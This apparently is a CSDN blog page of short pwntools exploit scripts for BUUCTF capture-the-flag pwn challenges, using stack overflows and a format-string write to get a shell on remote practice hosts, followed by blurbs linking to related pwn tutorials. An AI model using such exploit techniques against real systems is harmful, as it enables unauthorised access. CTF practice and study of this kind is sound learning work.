代码编织梦想

wustctf2020_getshell2   exp

from pwn import *



p = remote("node4.buuoj.cn", 27238)
call_system=0x8048529
sh_addr=0x08048670
payload=b'a'*28+p32(0x8048529)+p32(sh_addr)
p.sendline(payload)



p.interactive()





wustctf2020_getshell  exp

from pwn import *



p = remote("node4.buuoj.cn", 27723)

payload=b'a'*28+p32(0x0804851B)
p.sendline(payload)



p.interactive()





level0 exp

from pwn import *



p = remote("node4.buuoj.cn", 28051)
payload=b'a'*128+b'b'*8+p64(0x00400596)

p.sendline(payload)

p.interactive()





[第五空间2019 决赛]PWN5

from pwn import *



p = remote("node4.buuoj.cn", 28342)
payload=fmtstr_payload(10,{0x804c044:1111})

p.sendlineafter('your name:',payload)
p.sendlineafter('your passwd:',str(1111))

p.interactive()





bjdctf_2020_babystack  exp

from pwn import *



p = remote("node4.buuoj.cn", 28783)
p.sendline(str(-1))
payload=b'a'*24+p64(0x4006E6)
p.sendline(payload)



p.interactive()





ciscn_2019_n_1exp

from pwn import *



p = remote("node4.buuoj.cn", 29026)
payload=b'I'*20+b'A'*4+p32(0x08048F0D)

p.sendline(payload)

p.interactive()





版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/orange_cat__/article/details/127901774

栈迁移学习(buuctf [Black Watch 入群题])-爱代码爱编程

i春秋的borrowstack是栈迁移和万能gadget的混合,,,然后writeup看的不是很明白,也没有很细的解析,所以,emmm,应该是自己栈迁移学的不是很好,只是知道大概的意思,但是还没有做过题,这次在看雪看到文章,就好好学一下,做到题啦!! 栈迁移,我觉得比较好理解,如果试过将调用一个函数过程好好自己试过的话,知道控制ebp,可以控制函数的去向

pwn零基础入门-爱代码爱编程

pwn零基础入门 很多初学者在初学pwn的时候,对pwn可能存在许多疑问,学什么,怎么学,今天和大家分享一下刚学pwn的一些资料的学习历程。 首先分享一下pwn的一系列学习资料 一、首先语言基础得打牢,1、汇编语言,《汇编语言—王爽》2、编程语言(C语言和python)C语言必须要会,题目大部分是用C语言写的,而且很多那些知识都要读libc的源代码。会py

BUUCTF刷题记录(7)-爱代码爱编程

文章目录 web[NPUCTF2020]ezinclude[NPUCTF2020]ReadlezPHP[GXYCTF2019]BabysqliV3.0非预期1非预期2预期[NCTF2019]SQLi[HarekazeCTF2019]encode_and_encode[GKCTF2020]CheckIN[GKCTF2020]cve版签到[GKCTF2

PWN题型之Ret2Libc-爱代码爱编程

文章目录 前言0x1 :使用前提条件0x2 :解题思路0x3 :32位程序libc题型模板0x4 :代码的解析0x5 :64位程序实例 前言 菜鸡总结,如有不对,请不吝赐教。 0x1 :使用前提条件 存在溢出条件,题目没有system等后门函数,并且开启了NX保护 NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原

[BUUCTF]PWN——[极客大挑战 2019]Not Bad详细解释-爱代码爱编程

从这道题可以学到shellcode的一般使用方法,和orw的一般方法 这道题开启了secure computing mood 使用seccomp看到可以使用的函数 使用vmmap查看哪里可以写shellcodeIDA中也有看到使用vmmap开启了一段内存 这里mmap参数类型是(起始地址,大小,保护类,文件描述符等) 我们只需要关注保护类权限 PROT_R

BUUCTF 第五空间2019 pwn5-爱代码爱编程

BUUCTF 第五空间2019 pwn5 程序分析 国际惯例checksec一下 Ahead of main 然后打开IDA分析,IDA加载完过后,直接按F5,出现的是这些代码而不是main函数的代码 可以看到,有一个叫__libc_start_main的函数,它的参数中包含main函。程序执行时,并不是最先执行的main函数,在这之前还执行了很多

pwn基础ROP-碎片组合-爱代码爱编程

题源:基本 ROP - CTF Wiki (ctf-wiki.org) 的ret2syscall ①:老套路,先检查。  没有RXW可执行段。而且NX保护打开了。  ②:拉到IDA反汇编。 没有system,也没有可直接利用的后门函数,但是有bin/sh。什么也没有。而且段都是不可执行段,也不能直接写入整个shellc

[HarekazeCTF2019]baby_rop2-爱代码爱编程

[HarekazeCTF2019]baby_rop2 使用checksec查看: 只开启了栈不可执行。 先放进IDA中分析: v3 = read(0, buf, 0x100uLL);:变量buf可读入0x100大小的数据,距离rbp 0x20,存在栈溢出。题目思路 在静态代码审计的时候只发现了一个栈溢出漏洞。程序中没有system()函数,也没有

格式化字符串漏洞-爱代码爱编程

菜鸟记录格式化字符串的学习总结,方便复习。 格式化字符串漏洞 学习格式化字符串之前,先得了解什么是格式化字符串。 格式化字符串 printf("格式化字符串1,格式化字符串2",参数1,参数2...) 格式化允许我们部分控制显示文本的样式,我们可以通过代替特殊的格式字符来显示值或者数据,比如,要显示整形的变量"data",就可以使用下面的格式化

BUUCTF pwn wp 126 - 130-爱代码爱编程

gyctf_2020_document gyctf_2020_document$ file gyctf_2020_document;checksec gyctf_2020_document gyctf_2020_document: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynam

CTF-PWN-buuctf-pwn1_sctf_2016-CPP的字符串替换-爱代码爱编程

CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1bSrSQZYWkBIWCXP5Lsq7sg?pwd=mpgo 提取码:mpgo 答案:flag{714a8f91-7e24-440c-8cc6-1f2d26adbcec} 总体思路 发现get_f

pwn刷题num24----ret2libc + 栈平衡-爱代码爱编程

BUUCTF-PWN-ciscn_2019_c_1 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----可能存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 运行程序后,有三个选

【pwn】buuctf ciscn_2019_s_4 wp 栈迁移_n1c3wn的博客-爱代码爱编程

前言 因为做的时候心态崩了,此wp当个人日记来写了 = = WP 查看保护:32位程序,开启了nx保护 查看hack函数: 这是echo flag,不是flag.txt,所以ret到这里不能得到flag 虽然没有用,但是帮我们引入了system函数,就不需要ret2libc了,我们再写入“/bin/sh”构造ROP链就行 查看vuln函数

日行一pwn之ciscn_2019_c_1不给出libc题型_彤彤学安全的博客-爱代码爱编程

本文已参与「新人创作礼」活动,一起开启掘金创作之路 BUUCTF ciscn 依旧使用buu提供的题 这次大体和上次babyrop一样,都是使用源程序中不存在的函数来进行攻击,区别在于此次没有给出libc的版本,我们需要自己暴漏libc的版本 以及本次的64位程序,在传参上和32位程序的一些不同 闲话少叙,后面需要的知识点我们后面再学,我们便分析边

ctf比赛pwn题sgtlibc通用快速解题框架_serfend的博客-爱代码爱编程

CTF比赛PWN题sgtlibc通用快速解题框架 安装 开源地址:https://github.com/serfend/sgtlibc 使用 pip install sgtlibc -U 安装pwn解题框架 示例demo 目前收集了一些栈溢出上的通用解题框架,基本上对于简单题可以做到稍加修改配置即可解题,以实现1分钟得到flag效果。

buuctf--第五空间决赛pwn5_sandw1tchzs的博客-爱代码爱编程

 题目如下图   如图可见printf函数存在明显的格式化字符串漏洞,后续通过atoi函数判断读入的整数是否与dword_804c044中存放的值相等来决定是否getshell  32位参数在栈上(其实应该是先checksec再拖进ida才对) 首先利用printf确定格式化字符串位置  可见0x61616161(aaaa)在第十个参数部